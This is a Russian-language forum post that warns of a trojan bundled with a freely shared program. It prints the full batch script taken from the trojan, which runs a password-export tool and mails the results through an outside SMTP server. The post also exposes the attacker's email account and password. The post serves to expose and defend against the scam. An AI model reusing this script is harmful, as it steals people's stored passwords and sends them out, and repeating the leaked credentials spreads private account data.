Если кто не понял, то LeRoy777 это разводила, который прикрутил виря к уже имеющейся проге, и вынуждал всех запустить его у себя. Вирь крадет пароли от всего что попадется и отсылает все на
anatole.upyachka@yandex.ru ,точнее отсылал до вчера.
Привожу весь батник выковырнутый из трояна:
blat.exe -install -server smtp.yandex.ru -port 587 -f
anatole.upyachka@yandex.ru -u anatole.upyachka -pw 9881994q
Как вы уже поняли 9881994q это пароль.
Лавочка прикрыта, логин заблочен. Так что поосторожнее будьте с тем сыром, который в период охоты на мышей бесплатен=))) Если кто уже его прогу запускал, настоятельно советую переставить винду и сменить пароли на асях, майлагентах и прочем.... Эта чудо прожка умудриласт даже из The Bat! пароль дернуть.
Добавлено через 7 минут
То есть если приводить вообще весь батник, то вот такой он:
@echo off
:start
ping ya.ru -n 5 >nul
if %errorlevel%==0 (goto send) else (goto end)
:end
goto :start
:send
blat.exe -install -server smtp.yandex.ru -port 587 -f
anatole.upyachka@yandex.ru -u anatole.upyachka -pw 9881994q
mpr.exe /export
ren *.mpf pass.mpf
blat.exe -body PassReg -to
anatole.upyachka@yandex.ru -attach pass.mpf
del %Temp%\*.* /Q /S /F
Где mpr.exe это тырилка паролей, pass.mpf это файл куда тырить,blat.exe похоже на отсылалку на мыло файла pass.mpf
Не ищите их на винте, они создаются в аваке темп во время запуска проги и удаляются.
Также присутствует файл HookLib.dll, название которого наводит на мысль о клавиатурном шпионе. Так что чистите винду от халявноно сыра, Господа=))))))))))
Добавлено через 39 минут
 |
Цитата: |
 |
|
|
|
|
|
|
|
|
народа готового платить за программу очень мало
|
|
 |
|
 |
|
А нахрена за нее платить если ОБТ, которое уже с год длится бесплатно?)))) Оно еще года 2 длиться будет, и по этому никто платить не будет. Всем халяву подавай.